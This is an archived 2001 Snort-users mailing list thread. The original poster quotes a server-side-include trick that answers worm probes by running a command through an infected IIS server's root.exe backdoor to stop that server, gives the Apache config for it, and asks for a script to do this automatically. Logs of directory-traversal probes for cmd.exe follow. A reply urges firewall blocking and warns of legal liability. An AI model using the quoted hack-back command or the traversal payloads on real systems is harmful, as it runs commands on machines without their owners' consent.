Snort mailing list archives

RE: Shut them down, I have had enough...

From: Klimarchuk John <JKLIMARCHUK () TyComLtd com>
Date: Wed, 19 Sep 2001 06:30:19 -0400

Why don't you just set your firewall to drop all packets coming from that or
those ip addresses?  Remember, if you send a DDos to that or those servers,
you are just as guilty as those administrators of not doing due diligence.
Depending on the damage and downtime associated with your proposed DDos, YOU
can be held liable.  I don't think your company would like that too much!

-----Original Message-----
From: Franki [mailto:franki () gshop com au]
Sent: Wednesday, September 19, 2001 3:03 AM
To: snort-users () lists sourceforge net
Subject: [Snort-users] Shut them down, I have had enough...

Hi all,

I have seen in the past a php script that would shut down infected IIS
servers that are trying to infect linux box's

I havn't done it, because I didn't really think it was that nice a thing to
do...

This is the one I saw...

1) Create a file called default.ida, in there add this:

<!--#exec cmd="lynx -source
http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->

On one line, if it wraps in your mail client....

2) Then in your httpd.conf or similar... add this

AddType text/html .ida
AddHandler server-parsed .ida


but I checked my personal server this morning and the httpd error log looks
like this. (see the end of the email)

anyway, I'd like to setup the server to shutdown any IIS box that asks for
cmd.exe or root.exe

Does anyone know how this can be done using either perl or php???

has anyone already done it? if so where can I find it???

I am tired of this, I have a very limited bandwidth, and even if it isn't
doing any damage, its chewing up the bandwidth.. and costing me money, as
far as I am now concerned, they have three choices, either patch their
server, pay my bandwidth bill, or get their servers shut down alot...

Any help would be much appreciated.

Regards

Frank
Perth WA



[Wed Sep 19 14:47:27 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:47:28 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/d/winnt/system32/cmd.exe
[Wed Sep 19 14:47:31 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:47:33 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32
/cmd.exe
[Wed Sep 19 14:47:34 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32
/cmd.exe
[Wed Sep 19 14:47:40 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../w
innt/system32/cmd.exe
[Wed Sep 19 14:47:42 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
[Wed Sep 19 14:48:00 2001] [error] [client 203.47.134.211] File does not
exist: /var/www/html/otherwebs/epay/default.ida
[Wed Sep 19 14:48:13 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/scripts/root.exe
[Wed Sep 19 14:48:14 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/MSADC/root.exe
[Wed Sep 19 14:48:15 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/c/winnt/system32/cmd.exe
[Wed Sep 19 14:48:16 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/d/winnt/system32/cmd.exe
[Wed Sep 19 14:48:18 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:48:19 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32
/cmd.exe
[Wed Sep 19 14:48:21 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32
/cmd.exe
[Wed Sep 19 14:48:23 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../w
innt/system32/cmd.exe
[Wed Sep 19 14:48:24 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
[root@mail httpd]# tail -50 error_log
[Wed Sep 19 14:53:18 2001] [error] [client 203.47.1.130] File does not
exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:18 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:19 2001] [error] [client 203.47.1.130] File does not
exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not
exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..A../..A../..A../wi
nnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.1.130] File does not
exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe
[Wed Sep 19 14:53:20 2001] [error] [client 203.47.85.202] File does not
exist: /var/www/html/otherwebs/ezetax/_vti_bin/..%5c../..%5c../..%5c
../winnt/system32/cmd.exe
[Wed Sep 19 14:53:21 2001] [error] [client 203.47.1.130] File does not
exist: /var/www/html/scripts/..A?../winnt/system32/cmd.exe
[Wed Sep 19 14:53:21 2001] [error] [client 203.176.30.78] File does not
exist: /var/www/html/otherwebs/ezetax/scripts/..%2f../winnt/system32
/cmd.exe
[Wed Sep 19 14:53:22 2001] [error] [client 203.47.1.130] File does not
exist: /var/www/html/scripts/..A../winnt/system32/cmd.exe



_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users

Current thread:

Shut them down, I have had enough... Xno Xutz (Sep 19)
- <Possible follow-ups>
- RE: Shut them down, I have had enough... Klimarchuk John (Sep 19)
  - RE: Shut them down, I have had enough... Franki (Sep 19)
    - RE: Shut them down, I have had enough... John Berkers (Sep 19)
    - Re: Shut them down, I have had enough... Jason Costomiris (Sep 19)